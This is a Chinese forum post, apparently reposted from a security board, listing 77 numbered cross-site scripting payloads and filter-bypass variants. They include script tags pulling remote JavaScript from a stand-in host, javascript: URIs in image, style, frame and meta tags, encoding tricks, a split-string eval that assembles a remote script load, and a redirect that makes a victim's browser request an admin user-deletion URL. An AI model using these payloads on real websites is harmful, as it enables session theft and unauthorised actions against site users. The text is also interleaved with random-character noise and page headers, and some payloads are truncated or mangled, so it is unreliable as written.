貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
& ^3 t, I) n# Y+ p5 Y(1)普通的XSS JavaScript注入: e0 b8 R& S# f( |; E) z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* Y3 h, S$ `( h
(2)IMG标签XSS使用JavaScript命令( h |4 n( A* w$ Y# K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* x, w) l; F1 u. ?0 a X
(3)IMG标签无分号无引号
; \) u% e$ R7 X<IMG SRC=javascript:alert(‘XSS’)>) C% j* Z- p: z, B$ A+ j5 Z
(4)IMG标签大小写不敏感
8 m. K2 R8 W6 O2 ~6 c$ g K8 v<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
. M3 `; R" U% a' @9 Y(5)HTML编码(必须有分号)
- P; n% {3 X k9 U3 z<IMG SRC=javascript:alert(“XSS”)>
5 r% A# k4 b3 G4 o(6)修正缺陷IMG标签# J. ^7 W: M6 P' I1 R/ v# @
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 }! S6 `; _* e" K
B: m. w4 t7 N3 `0 \4 X$ E; Z- K, q9 U8 {: S; s6 X/ u" f
(7)formCharCode标签(计算器)
* @2 @ [$ P: S, [0 y& g' w' C4 V<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ |+ d" q+ h0 L) x% |(8)UTF-8的Unicode编码(计算器); T4 C4 ?) f8 G
<IMG SRC=jav..省略..S')>
( j k8 m, y; h% |1 X# q; t3 C(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* O' k# H- e/ K& Z% @
<IMG SRC=jav..省略..S')>
( Z! ] ?/ B( _3 W(10)十六进制编码也是没有分号(计算器)/ |& k- M! @9 N \, x$ q9 l T
<IMG SRC=java..省略..XSS')>
9 t$ l6 D& \7 P; ^1 G(11)嵌入式标签,将Javascript分开
7 l! c8 L5 G' m<IMG SRC=”jav ascript:alert(‘XSS’);”>
( z% O3 M% n6 M6 ~) l+ ?$ A* E! F8 L: a(12)嵌入式编码标签,将Javascript分开+ }) r6 g# p; c3 q, s6 k) f7 {; w
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 q* z2 v/ |% B( z* ? A
(13)嵌入式换行符
* G7 `: t7 g# n/ Z2 S' }& X<IMG SRC=”jav ascript:alert(‘XSS’);”>
& T# s2 T' _; ~(14)嵌入式回车
3 z8 A5 E0 T+ Y: f$ s<IMG SRC=”jav ascript:alert(‘XSS’);”># w1 {3 Z5 r; X1 i; X# ?/ h/ ^$ j
(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ r# i) Z4 K$ R$ [8 V4 g3 q: E f
<IMG SRC=”javascript:alert(‘XSS‘)”>* g2 @; i% U1 c6 ]: s9 \( F
(16)解决限制字符(要求同页面)
6 b; q h: B9 {9 Z5 D* c<script>z=’document.’</script>7 l. G/ e, v0 c c, g5 n" Y/ z( n
<script>z=z+’write(“‘</script>
* r4 T) G% T0 J, p/ @9 u<script>z=z+’<script’</script>: M% y* ?2 S6 M; F% g
<script>z=z+’ src=ht’</script>5 s! w) }% ]" c
<script>z=z+’tp://ww’</script>
' p" [& f% |* s$ k# D2 {5 c5 m, G<script>z=z+’w.shell’</script>
2 A$ `: D+ V$ C+ v( L6 a<script>z=z+’.net/1.’</script>
2 n0 k( o7 F( [0 G& n& P/ s0 |<script>z=z+’js></sc’</script>
: U \5 Z6 Q' D* Y1 X. G<script>z=z+’ript>”)’</script>
* b' V, @" q ]<script>eval_r(z)</script>
f0 K$ R! p; X. S(17)空字符12-7-1 T00LS - Powered by Discuz! Board
+ @( Y* U% n& [https://www.t00ls.net/viewthread ... table&tid=15267 2/6
: z$ f E+ l+ K) |& C* Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
T1 M/ v) f0 M/ W7 E" k' v$ E(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
% M0 m0 w* o+ u3 ]- W" [perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 V( S) s5 y8 o
(19)Spaces和meta前的IMG标签1 ` l6 N4 Q3 |" a
<IMG SRC=” javascript:alert(‘XSS’);”>% x4 S. b" O/ O1 A! w
(20)Non-alpha-non-digit XSS
- x1 w0 S7 K0 `0 N! f& `. m<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 |* u6 R, e3 I) }1 r, e
(21)Non-alpha-non-digit XSS to 2
1 H0 a( q. k* X; P<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 a1 x4 @, z6 B# N: A( C3 J! s(22)Non-alpha-non-digit XSS to 3' h2 ?. J, U% g( a8 ?' P$ t
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 E% O/ w; Y }+ d! d(23)双开括号
) A1 R' k7 ~) P8 x<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 P1 R$ ?$ c0 F* Y% K& L(24)无结束脚本标记(仅火狐等浏览器)
8 e/ Q9 Y3 R; _. a! |- q/ m<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 E8 z2 B2 N0 @, o+ P% E, Q(25)无结束脚本标记22 S6 _1 l5 X) [
<SCRIPT SRC=//3w.org/XSS/xss.js>
! r1 ]: c1 I: w) C# n(26)半开的HTML/JavaScript XSS( x5 v" Y0 [1 b4 X2 b- Q8 R0 P/ d
<IMG SRC=”javascript:alert(‘XSS’)”; ^) v' D, Z" f2 q: `
(27)双开角括号
# h" y0 |* M; f) H& m& l' G" R' m<iframe src=http://3w.org/XSS.html <
* b2 J; n/ D: h- K6 [. m(28)无单引号 双引号 分号/ O) W9 X2 K0 t
<SCRIPT>a=/XSS/) V; A) o% E% d4 Y) z2 v0 U
alert(a.source)</SCRIPT>5 b( {* g$ b6 z' U5 B8 }( F
(29)换码过滤的JavaScript
: M8 L8 F/ K* V$ B8 S3 E) _8 G\”;alert(‘XSS’);//. N3 ? c7 `' v$ n8 q: t3 H
(30)结束Title标签
% c# w& z' _- |9 r. V! D' Z* [</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>, c) H/ M' e, F
(31)Input Image
) Q2 i' m7 s+ [; O+ J<INPUT SRC=”javascript:alert(‘XSS’);”> l x4 k: ?) S$ ^) Z/ y' g
(32)BODY Image
8 v3 N2 _( w: O( P<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ i9 Y* ?# Z3 x" n4 A5 S
(33)BODY标签
5 z& ^) L7 R$ q/ e+ Q% d. j( O<BODY(‘XSS’)>
% \' s) j+ j# E2 A; X( @1 X(34)IMG Dynsrc7 b R- g" ]. u+ ?
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 H9 Z' r1 p6 n# S6 g
(35)IMG Lowsrc& L$ s5 k0 M& M* I/ t" m
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% ]6 B! m8 V: O8 C2 A5 e(36)BGSOUND% F1 W; h% P0 s4 [6 o8 w9 Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>5 x& U& j) W0 w6 o# P/ |+ B
(37)STYLE sheet+ ^- I+ o5 A4 H# T( l3 L
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, B) ^, |) \! X9 c, I(38)远程样式表
" ~* O6 _3 G+ @6 B7 m' k! C- @<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ I, p, N2 P% s! m8 {(39)List-style-image(列表式)
+ O6 l" M5 K& f( o" N9 w<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% B4 D, x- H2 U- l, I
(40)IMG VBscript
. R# R- `6 I( S4 }7 m# T& P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( M; t7 e2 `) B(41)META链接url
! Y! G K! K' D ~3 }# i* E, C
, T6 @! r7 g) a6 W
) K0 ^8 y6 _4 `9 C' g<META HTTP-EQUIV=”refresh” CONTENT=”0;/ S* d$ U9 z: q8 n- y" X4 Y* Z
URL=http://;URL=javascript:alert(‘XSS’);”>
5 _* C4 Q& \- d6 p! T3 ]& K(42)Iframe
( |! P. |- e7 h<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>+ l/ w0 Y" m% {. D
(43)Frame* b5 J( c+ _: \
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board* s( Y1 _" I) e* i" M8 C: ?
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
+ U- u* J7 [1 J6 \ Q(44)Table
" P- a8 X- c$ Y<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 p* u, Q% z: |, I
(45)TD
7 O0 A" l1 p0 [5 R8 G<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: h; v% m& r) J1 ]
(46)DIV background-image$ [2 t1 V: h* ~5 d5 b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 o; k9 {0 }. j) b
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
/ T7 W Q: @- b8&13&12288&65279)5 M ?3 V" `- \* ]% \7 \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' d8 f. I; s8 o9 \5 A* l1 r(48)DIV expression
9 l$ F' B5 g% j+ v: A<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& o- {4 y2 h8 J
(49)STYLE属性分拆表达
3 b; T4 c, h: v" N* s2 L& s( d<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: [, d( _/ a' X! e5 D0 o(50)匿名STYLE(组成:开角号和一个字母开头)
- c0 A$ k5 ^ m2 c6 P<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 { B/ h0 e) E2 h7 L(51)STYLE background-image
1 A' `1 K/ J! q1 ]; W: U/ b<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
, W. T5 |5 ]7 L7 H0 A1 mCLASS=XSS></A>5 o2 b: h8 z8 w9 g z" O
(52)IMG STYLE方式+ n6 e9 p" [- W1 C
exppression(alert(“XSS”))’>
) |: A2 v6 i' e7 B1 L; q(53)STYLE background( G" }2 W: {3 O8 X
<STYLE><STYLE
2 t8 u; }; B4 s7 k: d2 ptype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 s& O! I# j1 P! b, }& R(54)BASE
, P' U' ~+ s2 }& W$ ?<BASE HREF=”javascript:alert(‘XSS’);//”>
1 G# F8 z4 ]# B. v# P7 X: h8 m(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) F: n% |$ v/ C) H% J/ b
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
7 W; V$ V' l2 B% n) y(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 N6 I4 y O9 T3 \& `! na=”get”;
3 X9 J, k# x3 a6 X2 R) I: \b=”URL(\”";
6 R) y+ V2 l) \2 U$ p& x- j2 fc=”javascript:”;
; m1 a$ O# B, E& L, Md=”alert(‘XSS’);\”)”;' `% Q8 O0 i+ x* ~' Z
eval_r(a+b+c+d);
5 A" O- e1 D* S(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上+ W( z; l9 b9 {9 O$ d
<HTML xmlns:xss>
6 j1 @7 l9 p$ F) G( {& l$ V<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' ?2 E# [$ t- Z4 W4 X<xss:xss>XSS</xss:xss>
3 V% w" i3 D5 z0 Z/ W1 N3 D</HTML>
# F7 p, y5 h! N8 Z(58)如果过滤了你的JS你可以在图片里添加JS代码来利用# S( ~( J" w8 V# m( R* N2 u
<SCRIPT SRC=””></SCRIPT>
# x: i- y! `/ n' w0 O0 J5 Q' s(59)IMG嵌入式命令,可执行任意命令2 i5 H0 P, A: o7 S; Q7 o& K( u6 ] R7 q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% _5 ^, i# v8 @1 w3 I2 p0 x(60)IMG嵌入式命令(a.jpg在同服务器)$ L: ?; h) o% K: A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( N3 U' d! g9 R0 h+ ^2 [! r- J
(61)绕符号过滤 x- w1 X* h ? A
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* v0 p, N8 Y) W$ K$ g# y& W& ?) I(62)) i1 o% k" _7 i+ n% r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) F5 D& l. M' d. X
(63)4 N) E3 H2 W% j: l" H
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 T7 r: \1 E4 e+ ]" Y% G" r0 R8 Y(64) z: E k$ v' C& D: M3 S' `. K9 I
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 ~' V0 D; p1 [- }" f(65)
! J% [9 Y/ S8 j: u" y! E<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 e# v- _. F) g(66)12-7-1 T00LS - Powered by Discuz! Board
6 f5 I, ~+ d3 c4 x: i1 p6 ~5 Z, ]https://www.t00ls.net/viewthread ... table&tid=15267 4/6
* \7 [3 [& P A# x& F6 H<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 ^, _" D, I6 n, a" e8 b(67)9 Z0 T/ n% H0 t6 |1 n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”> x" A& z0 b# m o9 f6 G
</SCRIPT>
@% k/ b2 N( |* W2 B5 V0 S( F(68)URL绕行/ k/ z% Y( q8 n+ a: y
<A HREF=”http://127.0.0.1/”>XSS</A>
- d, J4 f% ?; U8 w4 h& J2 n, R(69)URL编码
% \" }$ R+ Q1 D( z; h# g! f/ [( T<A HREF=”http://3w.org”>XSS</A>
4 O. S% @8 y2 u! s(70)IP十进制
9 w, l8 q1 |7 f<A HREF=”http://3232235521″>XSS</A>& L3 B/ ~ u. j7 X& ^
(71)IP十六进制$ e) E; w0 L7 W0 x6 M2 X
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
& R1 M( P9 ~5 w6 r' e H(72)IP八进制9 R, c$ I2 n6 z- S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>) ^; [) {+ t8 X. F
(73)混合编码3 y2 B7 \& e0 e$ A: ]
<A HREF=”h( H0 f, c" j* H
tt p://6 6.000146.0×7.147/”">XSS</A>
+ c1 Y8 O" T/ U- }/ [" q L(74)节省[http:]# f; M6 ]* N1 _- t7 O; \/ D
<A HREF=”//www.google.com/”>XSS</A>! \8 u: s8 T) o' \& B2 w$ U
(75)节省[www]; b, C9 S7 O; m5 l1 l* p
<A HREF=”http://google.com/”>XSS</A>
& C+ }: Y3 z" J0 W7 g0 O(76)绝对点绝对DNS
( I2 S: r+ ?, t5 w6 O4 x6 f8 D3 S& x<A HREF=”http://www.google.com./”>XSS</A>
' ~0 \/ Z; h7 Y(77)javascript链接
. V5 p2 d; b; Y( N3 N; l<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- i' f, f. M3 g1 [" t
+ N5 P+ m% E$ l% y原文地址:http://fuzzexp.org/u/0day/?p=14
/ ^7 P9 K7 E6 W. J6 Q* ?' z! M# A" X2 d7 ?/ z/ Q# @# n# ^8 [
|
发表于 2013-4-19 19:22:37
收藏
支持
反对